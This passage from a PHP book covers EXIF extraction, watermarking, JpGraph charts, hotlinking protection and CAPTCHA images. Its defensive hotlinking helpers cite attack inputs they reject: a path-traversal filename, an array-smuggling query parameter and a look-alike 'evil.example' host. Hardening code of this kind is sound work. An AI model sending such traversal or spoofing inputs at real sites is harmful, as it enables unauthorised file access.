              echo '<pre>';
              print_r($exif_data);
              echo '</pre>';
          ?>



      The above code displays all the EXIF information available for an image. For the
      sake of brevity, as there’s a lot of meta information in the array, here’s a subset of
      the information available to us:

          Array
          (
              [FileName] => terrier.jpg
              [FileDateTime] => 1185158396
              [FileSize] => 46196
              [FileType] => 2
              [MimeType] => image/jpeg
              [Make] => FUJIFILM
              [Model] => FinePix S9500
              [ExposureTime] => 10/520
              [FNumber] => 390/100
              [ISOSpeedRatings] => 80
              [ShutterSpeedValue] => 576/100
          )
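
Notice that values such as ExposureTime and FNumber arrive as fractions written out in a string. If you'd like to show them in a friendlier form, a small conversion is needed. The exifRationalToFloat function below is a hypothetical helper written for this sketch, not one of PHP's EXIF functions:

```php
<?php
// Hypothetical helper: converts an EXIF rational such as "390/100"
// into a float; returns null when the value isn't a usable fraction.
function exifRationalToFloat($value)
{
    $parts = explode('/', $value);
    if (count($parts) != 2 || !is_numeric($parts[0])
        || !is_numeric($parts[1]) || $parts[1] == 0) {
        return null;
    }
    return $parts[0] / $parts[1];
}

$fNumber  = exifRationalToFloat('390/100');  // the aperture, 3.9
$exposure = exifRationalToFloat('10/520');   // the exposure time in seconds
echo 'f/' . $fNumber . "\n";
echo '1/' . round(1 / $exposure) . " s\n";
```

Returning null for anything that isn't a clean fraction lets the calling code decide whether to skip the value or display it unchanged.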



      Let’s take this information and update the output for the gallery we built in “How
      can I put together a simple thumbnail gallery?”. All we need to do is modify the
      code that generates the markup in the $image_html variable, like so:




      7 http://www.php.net/exif/

                                                              exifGallery.php (excerpt)

      if($ext[$size-1] == 'jpg')
      {
        $exif_data = exif_read_data( 'sample_images/' . $image );
      }
      else
      {
        $exif_data = array();
      }
      $image_html .= '<div class="image">';
      $image_html .= '<div class="thumbnail">';
      $image_html .= '<a href="sample_images/' . $image . '">';
      $image_html .= '<img src="sample_images/thumb_' . $image . '">';
      $image_html .= '</a></div>';
      $image_html .= '<div class="exifdata">';
      if(isset($exif_data['FileDateTime']))
      {
        $image_html .= '<p>Date: ' .
            date( 'jS F Y', $exif_data['FileDateTime'] ) . '</p>';
      }
      if(isset( $exif_data['Make']))
      {
        $image_html .= '<p>Taken with: ' . $exif_data['Make'];
        if(isset($exif_data['Model']))
        {
            $image_html .= ' ' . $exif_data['Model'];
        }
        $image_html .= '</p>';
      }
      $image_html .= '</div></div>';



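In the above modification to our gallery, if the image is a JPEG image, we add to the
display the file’s date, and the make and model of the camera that was used, if those
details are available. Note that FileDateTime holds the file’s last-modified timestamp,
which may differ from the moment the picture was taken.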
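
Many cameras also record the moment of capture in a DateTimeOriginal entry, formatted as YYYY:MM:DD HH:MM:SS. The sketch below prefers that entry and falls back to FileDateTime. Treat it as an illustration under two assumptions: exifPhotoTimestamp is a hypothetical helper, and DateTime::createFromFormat requires PHP 5.3 or later, which is newer than the version this chapter otherwise targets:

```php
<?php
// Hypothetical helper: returns a Unix timestamp for the moment the
// photo was taken, falling back to the file's modification time.
function exifPhotoTimestamp($exif_data)
{
    if (isset($exif_data['DateTimeOriginal'])) {
        // EXIF stores dates as "YYYY:MM:DD HH:MM:SS".
        $taken = DateTime::createFromFormat(
            'Y:m:d H:i:s', $exif_data['DateTimeOriginal']);
        if ($taken !== false) {
            return $taken->getTimestamp();
        }
    }
    if (isset($exif_data['FileDateTime'])) {
        return $exif_data['FileDateTime'];
    }
    return null;
}
```

The returned timestamp can be passed to date() exactly as FileDateTime is in the gallery code. The capture time is interpreted in PHP's default time zone, since EXIF dates of this form carry no zone of their own.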

As you can see, the EXIF data appears beneath the appropriate images in Figure 8.5.




                         Figure 8.5. The thumbnail gallery displaying images’ EXIF data


      How do I add a watermark to an image?
      So, you really like your photos, and you want to protect them with a watermark.
      That is, you want to place some identifying image or text within the original image
      to show that you own the copyright to it. With the GD library and PHP, watermarking’s
      a snap!

      Solutions
      The imagestring function can be used to place text within an image, while the
      imagecopymerge function can be used to place another image within your original
      image. Using either of these functions is extremely easy.

      Displaying a Text Watermark
      Adding text to an image is the simplest form of watermarking. Here’s how it works:

                                                                     textWatermark.php (excerpt)

 <?php
 $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg');
 $color = imagecolorallocate($image, 68, 68, 68);
 imagestring($image, 5, 90, 0, "Abbey '07", $color);

 header('Content-Type: image/jpeg');
 imagejpeg($image);
 ?>



The imagecolorallocate function allows you to create a new color to use for
drawing on the image by specifying the red, green, and blue components. The
function returns a number, which identifies that color in the image.

Once you have the color in hand, you can use the imagestring function to place
the text over the image. The first of the function’s arguments is the image, and the
second is a font number—the numbers 1–5 refer to built-in fonts. You can use
imageloadfont to make other fonts available. The third and fourth arguments represent
the horizontal and vertical coordinates at which the text should be drawn
on the image. The fifth argument contains the text you wish to be placed in the
image, and the last argument specifies the color of the text. The output of this script
is shown in Figure 8.6.
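
The coordinates in the example are hard-coded, but because the built-in fonts are fixed-width, they can also be calculated. Here's a minimal sketch; textWatermarkPosition is a hypothetical helper, and the character size passed to it below is a placeholder rather than a measured value:

```php
<?php
// Hypothetical helper: works out where to start drawing so that a
// single line of text sits in the bottom-right corner of the image.
function textWatermarkPosition($imgWidth, $imgHeight,
    $charWidth, $charHeight, $text, $padding = 2)
{
    $textWidth = $charWidth * strlen($text);
    return array(
        'x' => max(0, $imgWidth - $textWidth - $padding),
        'y' => max(0, $imgHeight - $charHeight - $padding),
    );
}

// With GD loaded, the character size would come from
// imagefontwidth($font) and imagefontheight($font); the values
// below are placeholders chosen for illustration.
$pos = textWatermarkPosition(200, 150, 9, 15, "Abbey '07");
```

The resulting $pos['x'] and $pos['y'] values would then be passed as the third and fourth arguments to imagestring.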




                             Figure 8.6. Applying a text watermark


Displaying a Graphical Watermark
A logo or some other identifiable graphic with a transparent background is easily
placed over another image. Here’s an example:

                                                             imageWatermark.php (excerpt)

       <?php
       $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg');
       $iWidth = imagesx($image);

       $watermark = imagecreatefrompng(
           'sample_images/sitepoint_watermark.png');
       $wmWidth = imagesx($watermark);
       $wmHeight = imagesy($watermark);

       $xPos = $iWidth - $wmWidth;
       imagecopymerge($image, $watermark, $xPos, 0, 0, 0,
           $wmWidth, $wmHeight, 100);

       // The image is written as PNG, so the header must say so
       header('Content-Type: image/png');
       imagepng($image);
       ?>



      The process is a simple matter. Load the original image and the watermark image;
      then, once the original image’s width and the watermark’s width and height have
      been obtained, use imagecopymerge to place the watermark on the original image.
      The first two arguments to the imagecopymerge function are the original or
      destination image object, and the source image object (the watermark, in our case).
      The next four arguments represent the x and y coordinates of the destination image
      and source image respectively, starting from the top-left corner of the images. The
      following two arguments represent the width and height of the source image. The
      last argument represents the level of transparency desired for true color images:
      an argument of 100 specifies no transparency, while an argument of 0 causes the
      original image to remain unmarked by the watermark.

      The result, in this case, is shown in Figure 8.7—a miniature SitePoint logo appears
      in the upper-right corner of the photo.
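
The example pins the watermark to the upper-right corner by subtracting the watermark's width from the image's width. The same arithmetic extends to the other corners. The watermarkPosition function below is a hypothetical helper written for this sketch, with an optional margin added as an assumption about what you might want:

```php
<?php
// Hypothetical helper: returns the destination x and y coordinates
// that place a watermark in the named corner of an image.
function watermarkPosition($iWidth, $iHeight, $wmWidth, $wmHeight,
    $corner = 'top-right', $margin = 0)
{
    $right  = $iWidth - $wmWidth - $margin;
    $bottom = $iHeight - $wmHeight - $margin;
    switch ($corner) {
        case 'top-left':     return array($margin, $margin);
        case 'bottom-left':  return array($margin, $bottom);
        case 'bottom-right': return array($right, $bottom);
        default:             return array($right, $margin); // top-right
    }
}

list($xPos, $yPos) = watermarkPosition(200, 150, 60, 20, 'bottom-right', 5);
```

The two values would take the place of $xPos and 0 in the call to imagecopymerge.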




                             Figure 8.7. Applying a graphical watermark


How do I display charts
and graphs with PHP?
The display of data in graphical form is a powerful way to communicate with your
site’s visitors, and can help you to understand exactly how your site’s being used.
The graphs could show any relevant data, including your site’s monthly traffic
statistics, or counts of sales made on your site.

Solutions
A number of projects extend PHP’s basic capabilities to render images, allowing
data to be displayed as some form of graph or chart.

First and foremost is a project written in PHP that makes full use of the GD library
and PHP’s image functions: the excellent JpGraph library.8 You can do a lot with
JpGraph, and a detailed examination is beyond the scope of this book.
At over 1MB in size, the documentation is extremely thorough, and offers many
useful examples. If you’re looking for more advanced reading on JpGraph, I recommend
two articles by Jason E. Sweat: one at Zend Developer Zone,9 the other at php |
architect.10 Here, however, we’ll get a feel for the library as we use it to display
bar and pie charts for a given set of data.

Be aware that JpGraph is licensed free for noncommercial use only, so make sure you
read the licensing information on the site. The version I’ll use in this example is
2.2, which only works on PHP versions 5.1.0 and above. If you’re using PHP 4,
you’ll need to download version 1 of JpGraph. The code here also assumes that
you’ve added the jpgraph/src/ directory to your PHP include path, to allow the
JpGraph class files to be loaded.

8 http://www.aditus.nu/jpgraph/
9 http://devzone.zend.com/node/view/id/1260/
10 http://www.phparch.com/issuedata/2003/apr/sample.php


             JpGraph and PHP Error Notices
            You may run into trouble using JpGraph if you have PHP’s error notices switched
            on in php.ini. The generated error messages can cause the graph image to fail to
            display. The examples in this chapter explicitly disable notices in order to avoid
            this problem. See Chapter 9 for more information on how to control error reporting.


      Creating a Bar Graph
      First, let’s see how we can generate a bar graph with JpGraph:

                                                                           bargraph.php (excerpt)

       <?php
       error_reporting(E_ALL ^ E_NOTICE);

       require_once ('jpgraph.php');
       require_once ('jpgraph_bar.php');

       $xdata = array('Mousemats','Pens','T-Shirts','Mugs');
       $ydata = array (35,43,15,10);



      First, we turn off E_NOTICE reporting; then we include the core “engine” as well as
      the bar graph class (make sure you have it in your PHP include path). Next, we set
      up two arrays of sample data that will be plotted on the x and y axes of the graph.
      In a practical application, these might be results you’ve fetched from MySQL.
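
To give a feel for that, here's a minimal sketch of turning a result set into the two arrays. The $rows array stands in for rows fetched from a database, and its product and units column names are assumptions made purely for illustration:

```php
<?php
// Hypothetical result set, shaped like rows fetched from a database;
// the column names are assumptions made for this sketch.
$rows = array(
    array('product' => 'Mousemats', 'units' => 35),
    array('product' => 'Pens',      'units' => 43),
    array('product' => 'T-Shirts',  'units' => 15),
    array('product' => 'Mugs',      'units' => 10),
);

$xdata = array();
$ydata = array();
foreach ($rows as $row) {
    $xdata[] = $row['product'];      // labels for the x axis
    $ydata[] = (int) $row['units'];  // numeric values for the y axis
}
```

Casting the values to integers is a small precaution, as database drivers often hand numbers back as strings.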

      The JpGraph API is fairly self-explanatory, and comes with excellent documentation.
      The first step in generating a graph from our data arrays is to set up the
      foundations of the graph itself, setting its size and background color:

                                                                           bargraph.php (excerpt)

       // Width, height,cache filename
       $graph = new Graph(400,200,'auto');
       // Margin widths
       $graph->img->SetMargin(40,20,20,40);
       // X text scale, Y linear scale
       $graph->SetScale('textlin');
       // Plot background
       $graph->SetColor('white');
       // Margin color
       $graph->SetMarginColor('darkgray');
       // Use a drop shadow
       $graph->SetShadow();
       // Frame color
       $graph->SetFrame(true,'black');




It’s no problem to add a title to the graph. JpGraph comes with three built-in bitmap
fonts, two of which can be displayed in bold, as well as built-in support for a
number of TrueType fonts.11 Note that the TrueType fonts aren’t packaged with
JpGraph—they must be available separately, as part of your operating system fonts.
Next, we set the graph’s title:

                                                                          bargraph.php (excerpt)

 // Title text
 $graph->title->Set('Sales Figures for March');
 // Title color
 $graph->title->SetColor('white');
 // Title font
 $graph->title->SetFont(FF_VERDANA,FS_BOLD,14);



Now, let’s construct the x axis. Here, the labels are assigned using the SetTickLabels
method, ticks being the markers for each interval on the x axis:

                                                                          bargraph.php (excerpt)

 // Axis title text
 $graph->xaxis->title->Set('Product Type');
 // Axis title color
 $graph->xaxis->title->SetColor('black');
 // Axis title font
 $graph->xaxis->title->SetFont(FF_VERDANA,FS_BOLD,10);
 // Add labels
 $graph->xaxis->SetTickLabels($xdata);
 // Axis colors
 $graph->xaxis->SetColor('black','white');
 // Axis font
 $graph->xaxis->SetFont(FF_VERDANA,FS_NORMAL,8);
 // Hide ticks
 $graph->xaxis->HideTicks();

11 These include Courier, Verdana, Times, Comic, Arial, Georgia, Trebuchet, Gnome Vera, Chinese,
Japanese, and Hebrew fonts.




      The y axis will take numeric values that are generated automatically once the y data
      is added:

                                                                     bargraph.php (excerpt)

       // Axis title text
       $graph->yaxis->title->Set('Units Sold');
       // Axis title color
       $graph->yaxis->title->SetColor('black');
       // Axis title font
       $graph->yaxis->title->SetFont(FF_VERDANA,FS_BOLD,10);
       // Axis colors
       $graph->yaxis->SetColor('black','white');
       // Axis font
       $graph->yaxis->SetFont(FF_VERDANA,FS_NORMAL,8);
       // Hide ticks
       $graph->yaxis->HideTicks();



      In the following code, we create a new BarPlot object that handles the drawing of
      the bars on the chart:

                                                                     bargraph.php (excerpt)

       // Instantiate with Y data
       $bplot = new BarPlot($ydata);
       // Width of bars
       $bplot->SetWidth(0.75);
       // Set bar background color
       $bplot->SetFillColor('darkgray');



      All that remains is to add the bar chart plot object to the graph object, and send it
      to the browser:

                                                                              bargraph.php (excerpt)

 $graph->Add($bplot);
 $graph->Stroke();
 ?>



Figure 8.8 shows the outcome—it’s not bad for just 33 lines of PHP, is it?




                   Figure 8.8. Graph revealing a massive demand for pens in March


Creating a Pie Chart
Another type of graph that can be built very easily with JpGraph is the pie chart.
Let’s use the sample data we used in the last example to build a pie chart.

At the start of the script, we must include the main pie chart class and the class for
a three-dimensional pie chart:

                                                                               piechart.php (excerpt)

 <?php
 error_reporting(E_ALL ^ E_NOTICE);

 require_once ('jpgraph.php');
 require_once ('jpgraph_pie.php');
 require_once ('jpgraph_pie3d.php');

 $xdata = array('Mousemats','Pens','T-Shirts','Mugs'); // X Axis
 $ydata = array (35,43,15,10);



This time, rather than using the Graph class, we use the PieGraph class:

                                                                    piechart.php (excerpt)

       // Width, height, cache filename
       $graph = new PieGraph(400,200,'auto');
       // Margin color
       $graph->SetMarginColor('white');
       // Use a drop shadow
       $graph->SetShadow();
       // Frame color
       $graph->SetFrame(true,'black');



      We set this chart’s title as we did for the previous graph:

                                                                    piechart.php (excerpt)

       // Title text
       $graph->title->Set('March Sales');
       // Title color
       $graph->title->SetColor('black');
       // Title font
       $graph->title->SetFont(FF_VERDANA,FS_BOLD,14);



      We also need a legend to identify what each segment of the pie chart represents:

                                                                    piechart.php (excerpt)

       // Legend text color
       $graph->legend->SetColor('black');
       // Legend background color
       $graph->legend->SetFillColor('gray');
       // Legend position
       $graph->legend->Pos(0.02,0.61);



      Now, we create the three-dimensional pie chart object; we instantiate it with the y
      data while using the x data for the legends, and pop out two of the pie slices for
      effect:

                                                               piechart.php (excerpt)

 // Instantiate 3D pie with Y data
 $pie = new PiePlot3d($ydata);
 // Add X data to legends
 $pie->SetLegends($xdata);
 // Set color theme (earth|pastel|sand|water)
 $pie->SetTheme('earth');
 // Center relative to X axis
 $pie->SetCenter(0.36);
 // Size of pie radius in pixels
 $pie->SetSize(100);
 // Set tilt angle of pie
 $pie->SetAngle(30);
 // Pop out a slice
 $pie->ExplodeSlice(2);
 // Pop out another slice
 $pie->ExplodeSlice(3);



We’ll display a label next to each segment on the chart to identify the percentage
of the whole that segment represents:

                                                               piechart.php (excerpt)

 // The font
 $pie->value->SetFont(FF_VERDANA,FS_NORMAL,10);
 // Font color
 $pie->value->SetColor('black');
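
JpGraph takes care of the labels for us, but it can be handy to know the arithmetic behind a percentage label, for instance if you want to print the same figures in a table beside the chart. This sketch uses a hypothetical slicePercentages function and makes no claim about how JpGraph itself rounds its values:

```php
<?php
// Computes each slice's share of the total, rounded to one decimal.
function slicePercentages($ydata)
{
    $total = array_sum($ydata);
    $percentages = array();
    foreach ($ydata as $value) {
        $percentages[] = ($total > 0)
            ? round($value / $total * 100, 1)
            : 0.0;
    }
    return $percentages;
}

$shares = slicePercentages(array(35, 43, 15, 10));
```

With our sample data the total is 103 units, so each share is that product's units divided by 103.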



Finally, we add our pie chart object to the graph object and send it to the browser:

                                                               piechart.php (excerpt)

 $graph->Add($pie);
 $graph->Stroke();
 ?>



The result of our work is shown in Figure 8.9.




                                  Figure 8.9. The not-so-humble pie chart


      Discussion
      JpGraph represents the premier graphing solution for PHP, and it offers much more
      functionality than we’ve had a chance to explore with these examples. Of particular
      note is the fact that this solution allows you to store the rendered graphs as PNG
      files, so that you can render each graph once and reuse the finished image. If you
      wanted to save the graph created by the code above, you’d simply change the call
      to Stroke by supplying a filename, making sure that the web server has permissions
      to write to this location. Here’s an example:

       $graph->Stroke('humble_pie.png');



      This process will create a file called humble_pie.png, and won’t return anything to
      the browser.
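
To reuse a stored graph, your script needs some way to decide whether the saved file is still good enough. One simple approach, sketched here with a hypothetical cachedGraphIsFresh function and an age limit of your own choosing, is to check the file's age:

```php
<?php
// Hypothetical helper: true when a cached graph exists and is
// younger than $maxAge seconds.
function cachedGraphIsFresh($file, $maxAge, $now = null)
{
    if ($now === null) {
        $now = time();
    }
    return file_exists($file) && ($now - filemtime($file)) < $maxAge;
}
```

When the function returns true, the script could send an image/png Content-Type header and pass the file to readfile; otherwise it would build the graph, call Stroke with the filename, and then serve the fresh file in the same way.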


      How do I prevent the hotlinking of images?
      One problem you may encounter, particularly if your site hosts unique images, is
      other sites that hotlink to your images from their pages, in order to make it seem as
      though they own or host your cool images. Aside from the potential copyright issues
      here, hotlinking of your images by outside sites may also eat up your bandwidth.
      Hotlinking is to be avoided like the plague, as I’m sure you’ll agree!

      Solutions
      Here we have two solutions; one uses the mod_rewrite extension to Apache and
      the other uses PHP sessions.

Using Apache’s mod_rewrite
The default behavior of a web browser is to send a referer value with each HTTP
request. This value represents the URL from which the current request originated.
For HTTP requests for images, this URL should reflect the page on which the images
appear. We can have Apache check the referral information that the visiting browser
provides to ensure that the referring source for all requests for our site’s images is
a local web page. Although mod_rewrite rules can perform this kind of check, the
settings shown here rely on the SetEnvIfNoCase directive (part of mod_setenvif)
together with Apache’s Order and Allow access controls. For example, we can place
these settings in our web server’s httpd.conf file:

 SetEnvIfNoCase Referer "^http://www.sitepoint.com/" locally_linked=1
 SetEnvIfNoCase Referer "^http://sitepoint.com/" locally_linked=1
 SetEnvIfNoCase Referer "^$" locally_linked=1
 <FilesMatch "\.(gif|png|jpe?g)$">
     Order Allow,Deny
     Allow from env=locally_linked
 </FilesMatch>



Here, we indicate that any request for a file with a name that ends in .gif, .png, .jpeg,
or .jpg, and which has a referer field that begins with http://www.sitepoint.com/ or
http://sitepoint.com/, or is blank, should be considered valid. This specification
should therefore block any requests for images for which none of those values are
reflected in the referer field. We need to allow requests with a blank referer field,
as they could be legitimate requests—it’s likely that some requests won’t have
referer information. For example, it’s entirely reasonable for a visitor to your web
site to have disabled the reporting of referer information for privacy reasons. In
short, the field cannot be relied upon to determine that hotlinking is taking place;
rather than risk blocking images for what may be a legitimate request, we need to
allow such requests.
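
If you can't edit the Apache configuration, much the same logic can be expressed in PHP. The following is only a sketch: isLocallyLinked is a hypothetical function, and unlike the Apache rules it compares the referer's host name, so it would accept https URLs as well:

```php
<?php
// Hypothetical helper mirroring the Apache rules: a blank referer
// is allowed, otherwise its host must be one of ours.
function isLocallyLinked($referer, $localHosts)
{
    if ($referer === null || $referer === '') {
        return true;
    }
    $host = parse_url($referer, PHP_URL_HOST);
    if (!is_string($host)) {
        return false;
    }
    return in_array(strtolower($host), $localHosts, true);
}

$hosts = array('www.sitepoint.com', 'sitepoint.com');
```

A script that serves images could pass in $_SERVER['HTTP_REFERER'] when it's set, or an empty string when it isn't. Comparing the whole host name, rather than matching a prefix, means a look-alike address such as www.sitepoint.com.evil.example is rejected.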

Using PHP Sessions
Another option is to use PHP sessions to establish that the person viewing the image
is a visitor to your site. The trick is to register a session variable that a visitor must
have in order to be able to view the image, then use a second script to render the
image. For example, here’s a simple web page that displays an image, where the
image source URL is a PHP script that ensures that only valid site visitors can see
the image:

                                                                                    hotlinking.php (excerpt)

       <?php
       session_start();
       $_SESSION['viewImages'] = true;
       ?>
       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           <title>Preventing Hotlinking</title>
           <meta http-equiv="Content-Type"
               content="text/html; charset=iso-8859-1" />
         </head>
         <body>
           <p>Here is the image:</p>
           <img src="getimage.php?img=husky.jpg">
         </body>
       </html>



      Notice that this code registers a session variable called viewImages, and a value of
      getimage.php?img=husky.jpg appears in the src attribute of the <img> tag. Here’s
      the code for that getimage.php script. Firstly, we check the viewImages session variable
      to see that it has been set to true:

                                                                                     getimage.php (excerpt)

       <?php
       session_start();
       if (isset($_SESSION['viewImages']) &&
           $_SESSION['viewImages'] == true)
       {



      If the viewImages session variable has been set to true, the image name provided
      via the $_GET['img'] variable is checked to ensure that it’s registered in the array
      of allowed images, $images:12




      12
          A more practical alternative is to store the list of images in a database. However you manage the list,
      it’s important to verify that the file requested is one you intended to grant access to; otherwise, you may
      be allowing access to more than you expect.

                                                            getimage.php (excerpt)

   $images = array(
       'golden_retriever.jpg',
       'husky.jpg'
       );
   if (isset($_GET['img']) && in_array($_GET['img'],$images))
   {



The request is valid, so we output the response headers and the image:

                                                            getimage.php (excerpt)

       $dims = getimagesize('sample_images/'.$_GET['img']);
       header('Content-Disposition: inline; filename=' . $_GET['img']);
       header('Content-Type: '.$dims['mime']); # PHP 4.3.x +
       header('Content-Length: ' . filesize('sample_images/' .
           $_GET['img']));
       readfile('sample_images/'.$_GET['img']);
   }



Notice that the script also uses the getimagesize function you saw earlier in “How
do I resize images without stretching them?” to obtain the correct MIME type for
the image.

Finally, we handle the error conditions by returning an HTTP status of 404 Not
Found:

                                                            getimage.php (excerpt)

   else
   {
     header("HTTP/1.1 404 Not Found");
     header("Content-Type: text/plain" );
     echo "Invalid image or no image specified\n";
   }
 }
 else
 {
   header("HTTP/1.1 404 Not Found");
   header("Content-Type: text/plain" );
   echo "This image is protected from hotlinking\n";
 }
 ?>




      This protection should stop all but the most determined hotlinkers.
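
The most security-sensitive part of getimage.php is the check against the list of allowed images, so it can be worth isolating. Here's a sketch of that idea; resolveAllowedImage is a hypothetical helper, and the strict comparison and the type check are additions of mine rather than part of the original script:

```php
<?php
// Hypothetical helper: returns the path of a requested image, or
// null when the name isn't on the list of permitted files.
function resolveAllowedImage($requested, $allowed, $dir = 'sample_images')
{
    if (!is_string($requested)) {
        return null;   // e.g. ?img[]=x delivers an array
    }
    // Strict comparison avoids PHP's loose type juggling.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    return $dir . '/' . $requested;
}

$images = array('golden_retriever.jpg', 'husky.jpg');
```

Because only exact matches from the list are ever turned into a path, a request such as ../secret.txt never reaches the file system.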


      How do I create images that can be
      verified by humans only?
      With the ever-growing number of automated spamming robots that tirelessly
      scour the Web, human-verification techniques are becoming an increasingly necessary
      part of the creation of web forms. The most common technique is the Completely
      Automated Public Turing Test to Tell Computers and Humans Apart (conveniently
      abbreviated to CAPTCHA), which presents the visitor with a word, or sequence of
      characters, in such a way that it’s hard for machines to decipher, but easy for a human
      being to read and type in.13

      Solution
      Conveniently, the JpGraph library we discussed in “How do I display charts and
      graphs with PHP?” comes with an extremely easy-to-use CAPTCHA implementation:

                                                                                        captcha.php (excerpt)

       <?php
       require_once "jpgraph_antispam.php";
       $spam = new AntiSpam();
       $chars = $spam->Rand(6);
       $spam->Stroke();
       ?>



      A sample result of this script is shown in Figure 8.10.




                                   Figure 8.10. A CAPTCHA image created using JpGraph



      13 You can read more about CAPTCHA at the official web site: http://www.captcha.net/.

If you want to specify a particular word to appear in the box, simply replace the
call to Rand with a call to Set:

 $spam->Set("my_string");



Discussion
Of course, this is only half the story. You’ll need to store the CAPTCHA text somewhere
(such as within a session variable) in order to validate the user-entered
version of the text on the next page. Don’t pass the text through as a form field,
though, even a hidden one, as it could be read or altered by a malicious user.
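
Here's one way the storing and checking might look. It's a sketch under a few assumptions: rememberCaptcha and checkCaptcha are hypothetical helpers, the comparison ignores case and surrounding spaces, and the $session parameter stands in for $_SESSION so that the logic can be tried without starting a real session:

```php
<?php
// Hypothetical helpers; $session stands in for $_SESSION so the
// logic can be exercised without starting a real session.
function rememberCaptcha(&$session, $chars)
{
    $session['captcha'] = $chars;
}

function checkCaptcha(&$session, $input)
{
    if (!isset($session['captcha'])) {
        return false;
    }
    $expected = $session['captcha'];
    // Discard the stored text so each CAPTCHA can be tried only once.
    unset($session['captcha']);
    return is_string($input)
        && strtolower(trim($input)) === strtolower($expected);
}
```

In captcha.php, you'd call session_start and then rememberCaptcha($_SESSION, $chars) before the call to Stroke; the script that processes the form would call checkCaptcha($_SESSION, $_POST['captcha']), where captcha is whatever name you've given the text field.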


Summary
In this chapter, we’ve examined the topics of MIME types, resizing images, creating
galleries, extracting EXIF information, watermarking, producing graphical charts,
preventing the hotlinking of your images, and creating CAPTCHA images. Add the
tips from other chapters in this book into the mix, and you’re well equipped to
create a host of image manipulation scripts, from the downright useful to the truly
unique.

However, one issue you should consider is the performance implications of on-the-fly
image manipulation, which chews through a significant amount of processing
time. Consider a gallery of 100 folders, each holding 100 images; this isn’t a particularly
excessive number, even for the casual holiday-maker. The creation of 10,000
thumbnails for every visitor is not a small task. Similarly, creating your company
web site’s banner image for every page load is not only time-consuming, but also
largely unnecessary.

While the simple thumbnail caching techniques we covered here might suit many
cases, they won’t be appropriate for those instances where the image might change
over time—the creation of charts based on ever-changing datasets is a case in point.
I highly recommend you refer to Chapter 11 for more advanced performance improvement
techniques.

The practice of manipulating images in PHP is widespread. Examples include social
networking sites that create thumbnails of your profile image, web page forms that
make use of CAPTCHA images, and photo gallery sites that allow you to edit, crop,

      and rotate your images in the web browser (most likely through the liberal sprinkling
      of JavaScript and Ajax). What you can achieve is, more or less, only limited by your
      imagination!
Chapter 9

Error Handling
In PHP, errors are used to indicate syntax, environmental, or programming problems:

syntax errors
    These are unrecoverable compile-time errors that indicate a syntax problem
    and cause the PHP interpreter to halt.

environmental errors
    Environmental errors are problems associated with the script’s runtime
    environment and associated services. Such errors may indicate a database
    server being unavailable, a file that’s unable to be opened, restrictions
    resulting from permission levels, and so on.

programming errors
    Programming errors are unexpected events that occur during normal program
    execution. This type of error may indicate, for example, passing unexpected
    arguments to a function call (such as an array when the function expects a
    string), referencing undefined variables or array indices, and so on.


             The Logic Error
            Another type of error—the logic error—is common but much harder to detect.
            Such an error produces an incorrect result as the output of apparently successful
            execution. These types of errors are often program design problems created by
            the programmer. They’re generally addressed during unit testing, and will not be
            covered in this chapter.


      Errors in PHP 5 come in two flavors: standard PHP errors and exceptions.

      Standard PHP error reporting handles all kinds of errors. Error messages are reported
      globally, and each is associated with an error level that represents the error’s
      severity or type. Traditionally, PHP environmental and programming errors were
      handled via a function’s return value, or by generating global warnings or fatal errors
      using the trigger_error or die functions. However, this was typically only the
      case for developers using versions prior to PHP 5, in which no other error reporting
      method was available.

      In PHP 5, exceptions are used to indicate that an exceptional event (for example,
      an environmental or programming error) has occurred, disrupting the normal execution
      of the script. Exceptions are reported using the throw statement, usually to
      indicate that execution cannot continue as expected. They’re caught and handled
      using a try {…} catch(Exception $e) {…} block, which is included as part of
      programming logic. Throwing and catching exceptions is the primary error-handling
      mechanism of object oriented programming. Every exception object is an instance
      of, or an instance of a subclass of, PHP 5’s native Exception class.

      In this chapter, we’ll look at the flexibility PHP offers in order to let us extend its
      native error- and exception-reporting mechanisms. We’ll also see how you can
      harness these mechanisms to gain greater control over the ways in which errors and
      exceptions are handled. These tools will help you when you’re dealing with errors,
      and provide you the means with which to gracefully exit execution, easily debug
      your applications, and successfully monitor the health of your applications.


      What error levels does PHP report?
      As I noted in the introduction, PHP errors fall into a variety of categories. Effective
      harnessing of PHP’s error-handling mechanisms requires some knowledge of PHP
errors, so let’s take a quick look at a summary of PHP error levels. You may also
want to check out the PHP error function manual page for full information on this
topic.1

Solution
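PHP categorizes errors into various levels, each represented by an integer constant
that acts as a bit flag, so levels can be combined with bitwise operators. The integer
values do not track severity: E_ERROR is 1, while E_NOTICE is 8. The error levels most
developers need to understand are shown in Table 9.1.2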
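
Because each level is a bit flag, levels can be combined and tested with bitwise operators. The following is a minimal sketch of that idea; the helper name levelIsReported and the two mask variables are hypothetical and exist only for illustration.

```php
<?php
// Hypothetical helper: reports whether $level is switched on in $mask.
function levelIsReported($mask, $level)
{
    return ($mask & $level) === $level;
}

// Combine levels with |, and remove levels with & ~.
$production = E_ERROR | E_USER_ERROR | E_WARNING | E_USER_WARNING;
$noNotices  = E_ALL & ~(E_NOTICE | E_USER_NOTICE);

var_dump(levelIsReported($production, E_WARNING)); // bool(true)
var_dump(levelIsReported($production, E_NOTICE));  // bool(false)
var_dump(levelIsReported($noNotices, E_NOTICE));   // bool(false)
var_dump(levelIsReported($noNotices, E_WARNING));  // bool(true)
```

The same masks can be passed to error_reporting or used as the second argument to set_error_handler.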


What built-in settings does PHP
offer for error handling?
If PHP can generate errors, there must be some automated way to handle these errors,
right? Providing error reporting facilities without the capabilities to handle the errors
leaves developers hobbled. So, what error handling settings are available to
developers?

Solutions
PHP has several built-in mechanisms for displaying and logging errors. Each of the
following directives may be administered via ini_set, your web server’s .htaccess
file, or the php.ini file.

The error_reporting Directive
Set the error_reporting directive to indicate which errors need to be reported.
During development, you’d typically set this directive to E_ALL | E_STRICT, which
will notify you of any PHP errors that occur in your application. Once your code
moves to the production environment, you may want to tighten this setting up a bit
so that your error logs (which we’ll discuss in detail in a moment) don’t fill up;
E_ERROR | E_USER_ERROR | E_WARNING | E_USER_WARNING is usually a good setting
for production environments.




1 http://www.php.net/errorfunc/

2 Note that the _USER variants indicate errors that are triggered in user code by
trigger_error, and that are of a roughly equivalent level of severity.

      Table 9.1. PHP Error Levels

       Level                                     Description

       E_NOTICE / E_USER_NOTICE                  This notice indicates a potential error in the
